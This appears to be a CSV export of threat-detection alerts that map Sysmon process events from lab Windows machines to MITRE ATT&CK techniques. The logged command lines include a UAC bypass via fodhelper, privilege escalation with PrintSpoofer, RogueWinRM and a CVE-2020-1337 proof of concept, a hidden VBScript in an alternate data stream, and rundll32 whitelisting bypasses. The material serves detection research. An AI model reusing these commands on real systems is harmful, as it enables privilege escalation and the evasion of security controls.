365ABB72-95E7-5CD3-0000-001004970F00 + 3784 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /C "C:\Windows\wscript.exe "C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"" + C:\Users\IEUser\AppData\Local\Temp\onedrive\ + IEWIN7\IEUser + 365ABB72-94CD-5CD3-0000-0020DD3A0100 + 0x13add + 1 + Medium + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-9570-5CD3-0000-00103FC90A00 + 1900 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436045.252684,2019-07-30T01:34:05.252684+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c rundll32 AllTheThings.dll,EntryPoint )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4965 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:05.213 + 747F3D96-664D-5D3F-0000-0010F1498C00 + 6836 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c rundll32 AllTheThings.dll,EntryPoint + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1088] Bypass User Account Control - Process,1564827248.681363,2019-08-03T14:14:08.681363+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5277 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-03 10:14:08.401 + 747F3D96-5E70-5D45-0000-0010FCDD9D00 + 3656 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-56A3-5D45-0000-0020B3D31800 + 0x18d3b3 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-5E6F-5D45-0000-001014CA9D00 + 8180 + C:\Windows\System32\fodhelper.exe + "C:\Windows\system32\fodhelper.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1561018068.92556,2019-06-20T12:07:48.925560+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "cmd" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 8116 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-06-20 08:07:48.909 + 365ABB72-3ED4-5D0B-0000-0010B2871A00 + 1440 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "cmd" + c:\ProgramData\ + IEWIN7\IEUser + 365ABB72-3991-5D0B-0000-002029350100 + 0x13529 + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-3D05-5D0B-0000-001004220D00 + 816 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564827248.681363,2019-08-03T14:14:08.681363+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5277 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-03 10:14:08.401 + 747F3D96-5E70-5D45-0000-0010FCDD9D00 + 3656 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-56A3-5D45-0000-0020B3D31800 + 0x18d3b3 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-5E6F-5D45-0000-001014CA9D00 + 8180 + C:\Windows\System32\fodhelper.exe + "C:\Windows\system32\fodhelper.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1556610375.246489,2019-04-30T11:46:15.246489+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c echo msdhch > \\.\pipe\msdhch ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 8575 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 07:46:15.183 + 365ABB72-FD47-5CC7-0000-00106AF61D00 + 4088 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c echo msdhch > \\.\pipe\msdhch + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-F6A1-5CC7-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-F6A1-5CC7-0000-001004550000 + 468 + C:\Windows\System32\services.exe + C:\Windows\system32\services.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious Argument,1588442517.418442,2020-05-02T22:01:57.418442+04:00,,Threat,Critical,"Found User (NT AUTHORITY\SYSTEM) run Suspicious PowerShell commands that include (powershell, -c , -i ,powershell) in event with Command Line (powershell.exe) and Parent Image :C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe , Parent CommandLine (PrintSpoofer.exe -i -c powershell.exe) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 110434 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-05-02 18:01:54.866 + 747F3D96-B592-5EAD-0000-0010D4CDC200 + 1428 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + PowerShell.EXE + powershell.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-6ABB-5EAD-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-B592-5EAD-0000-0010ECCBC200 + 6760 + C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe + PrintSpoofer.exe -i -c powershell.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1588442517.418442,2020-05-02T22:01:57.418442+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 110434 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-05-02 18:01:54.866 + 747F3D96-B592-5EAD-0000-0010D4CDC200 + 1428 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + PowerShell.EXE + powershell.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-6ABB-5EAD-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-B592-5EAD-0000-0010ECCBC200 + 6760 + C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe + PrintSpoofer.exe -i -c powershell.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1579034925.293727,2020-01-15T00:48:45.293727+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\explorer.exe ) through command line ( explorer ms-browser:// ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 348 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:48:45.193 + 747F3D96-292D-5E1E-0000-0010F5597D00 + 3828 + C:\Windows\explorer.exe + 10.0.17763.348 (WinBuild.160101.0800) + Windows Explorer + Microsoft® Windows® Operating System + Microsoft Corporation + EXPLORER.EXE + explorer ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-292D-5E1E-0000-0020CD587D00 + 0x7d58cd + 0 + High + SHA1=3EB9D6F8F4448CB1FD6478189EDEBE3D70477EA7,MD5=2F62005FCEA7430BB871A56F7700F81C,SHA256=B759293373A11D1A972873A902BC64B2C9690AB947CE4A185CD047195521296D,IMPHASH=0B98A47B3DAF2EE45939EF2A0F188959 + 747F3D96-2910-5E1E-0000-0010F5F07C00 + 4612 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1579034925.293727,2020-01-15T00:48:45.293727+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\explorer.exe ) through command line ( explorer ms-browser:// ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 348 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:48:45.193 + 747F3D96-292D-5E1E-0000-0010F5597D00 + 3828 + C:\Windows\explorer.exe + 10.0.17763.348 (WinBuild.160101.0800) + Windows Explorer + Microsoft® Windows® Operating System + Microsoft Corporation + EXPLORER.EXE + explorer ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-292D-5E1E-0000-0020CD587D00 + 0x7d58cd + 0 + High + SHA1=3EB9D6F8F4448CB1FD6478189EDEBE3D70477EA7,MD5=2F62005FCEA7430BB871A56F7700F81C,SHA256=B759293373A11D1A972873A902BC64B2C9690AB947CE4A185CD047195521296D,IMPHASH=0B98A47B3DAF2EE45939EF2A0F188959 + 747F3D96-2910-5E1E-0000-0010F5F07C00 + 4612 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 2164892 + + + + + Microsoft-Windows-Sysmon/Operational + LAPTOP-JU4M3I0E + + + + + + 2020-10-05 20:43:58.450 + 00247C92-858E-5F7B-0000-0010E741202B + 6636 + C:\Windows\System32\cmd.exe + 10.0.18362.449 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe + C:\windows\ + LAPTOP-JU4M3I0E\bouss + 00247C92-8C36-5F75-0000-002034E39103 + 0x391e334 + 2 + High + SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 00247C92-858E-5F7B-0000-00105241202B + 18404 + C:\Windows\System32\Taskmgr.exe + C:\windows\system32\taskmgr.exe + +",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1597237564.075706,2020-08-12T17:06:04.075706+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c schtasks /run /TN "Microsoft\Windows\Windows Error Reporting\QueueReporting" > nul 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 342414 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-08-12 13:06:03.484 + 747F3D96-E93B-5F33-0000-0010C1B40E00 + 7888 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + C:\Windows\system32\cmd.exe /c schtasks /run /TN "Microsoft\Windows\Windows Error Reporting\QueueReporting" > nul 2>&1 + C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\ + MSEDGEWIN10\IEUser + 747F3D96-E911-5F33-0000-0020241C0400 + 0x41c24 + 1 + Medium + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-E938-5F33-0000-00109CA00E00 + 7820 + C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\WerTrigger.exe + WerTrigger.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1584766854.689567,2020-03-21T09:00:54.689567+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243570 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:45.082 + 747F3D96-9F7D-5E75-0000-00104E062100 + 2484 + C:\Windows\System32\whoami.exe + 10.0.17763.1 (WinBuild.160101.0800) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami.exe + whoami + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 + 747F3D96-9F77-5E75-0000-001090F32000 + 2416 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1590282830.330775,2020-05-24T05:13:50.330775+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 196371 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-05-24 01:13:50.301 + 747F3D96-CA4E-5EC9-0000-00109FE23700 + 1516 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + c:\Windows\System32\cmd.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-BDD1-5EC9-0000-0020E7030000 + 0x3e7 + 1 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-CA4B-5EC9-0000-0010B8CB3700 + 3960 + C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe + RogueWinRM.exe -p c:\Windows\System32\cmd.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1561018068.909935,2019-06-20T12:07:48.909935+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "cmd" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 8114 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-06-20 08:07:48.894 + 365ABB72-3ED4-5D0B-0000-00106C871A00 + 888 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "cmd" + c:\ProgramData\ + IEWIN7\IEUser + 365ABB72-3991-5D0B-0000-002029350100 + 0x13529 + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-3D05-5D0B-0000-001004220D00 + 816 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1597237564.051227,2020-08-12T17:06:04.051227+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c copy Report.wer C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 342413 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-08-12 13:06:02.548 + 747F3D96-E93A-5F33-0000-001014B30E00 + 7868 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + C:\Windows\system32\cmd.exe /c copy Report.wer C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 + C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\ + MSEDGEWIN10\IEUser + 747F3D96-E911-5F33-0000-0020241C0400 + 0x41c24 + 1 + Medium + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-E938-5F33-0000-00109CA00E00 + 7820 + C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\WerTrigger.exe + WerTrigger.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557370343.500263,2019-05-09T06:52:23.500263+04:00,,Threat,Low,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /C "echo Dim objShell:Dim oFso:Set oFso = CreateObject("Scripting.FileSystemObject"):Set objShell = WScript.CreateObject("WScript.Shell"):command = "powershell.exe":objShell.Run command, 0:command = "C:\Windows\System32\cmd.exe /c ""start /b """" cmd /c ""timeout /t 5 >nul&&del C:\Windows\wscript.exe&&del C:\Windows\wscript.exe.manifest""""":objShell.Run command, 0:Set objShell = Nothing > "C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"" )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 11238 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-09 02:52:23.484 + 365ABB72-95E7-5CD3-0000-001046950F00 + 2812 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /C "echo Dim objShell:Dim oFso:Set oFso = CreateObject("Scripting.FileSystemObject"):Set objShell = WScript.CreateObject("WScript.Shell"):command = "powershell.exe":objShell.Run command, 0:command = "C:\Windows\System32\cmd.exe /c ""start /b """" cmd /c ""timeout /t 5 >nul&&del C:\Windows\wscript.exe&&del C:\Windows\wscript.exe.manifest""""":objShell.Run command, 0:Set objShell = Nothing > "C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"" + C:\Users\IEUser\AppData\Local\Temp\onedrive\ + IEWIN7\IEUser + 365ABB72-94CD-5CD3-0000-0020DD3A0100 + 0x13add + 1 + Medium + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-9570-5CD3-0000-00103FC90A00 + 1900 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1603490256.025174,2020-10-24T01:57:36.025174+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" conf3234.dll f8753 d948)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 423994 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:57:36.012 + 747F3D96-51D0-5F93-0000-001036A15B00 + 3396 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\System32\rundll32.exe" conf3234.dll f8753 d948 + C:\Users\IEUser\AppData\Local\Temp\tmp1375\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002085A50800 + 0x8a585 + 1 + High + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-51CD-5F93-0000-001073735B00 + 7624 + C:\Users\Public\test.tmp + c:\Users\Public\test.tmp + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490256.025174,2020-10-24T01:57:36.025174+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" conf3234.dll f8753 d948 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 423994 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:57:36.012 + 747F3D96-51D0-5F93-0000-001036A15B00 + 3396 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\System32\rundll32.exe" conf3234.dll f8753 d948 + C:\Users\IEUser\AppData\Local\Temp\tmp1375\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002085A50800 + 0x8a585 + 1 + High + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-51CD-5F93-0000-001073735B00 + 7624 + C:\Users\Public\test.tmp + c:\Users\Public\test.tmp + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1603490256.025174,2020-10-24T01:57:36.025174+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" conf3234.dll f8753 d948 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 423994 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:57:36.012 + 747F3D96-51D0-5F93-0000-001036A15B00 + 3396 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\System32\rundll32.exe" conf3234.dll f8753 d948 + C:\Users\IEUser\AppData\Local\Temp\tmp1375\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002085A50800 + 0x8a585 + 1 + High + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-51CD-5F93-0000-001073735B00 + 7624 + C:\Users\Public\test.tmp + c:\Users\Public\test.tmp + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1584766840.502366,2020-03-21T09:00:40.502366+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243568 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:39.417 + 747F3D96-9F77-5E75-0000-001090F32000 + 2416 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-9F61-5E75-0000-0010686A1E00 + 4848 + C:\Windows\System32\rundll32.exe + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1597237563.487498,2020-08-12T17:06:03.487498+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c mkdir,C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 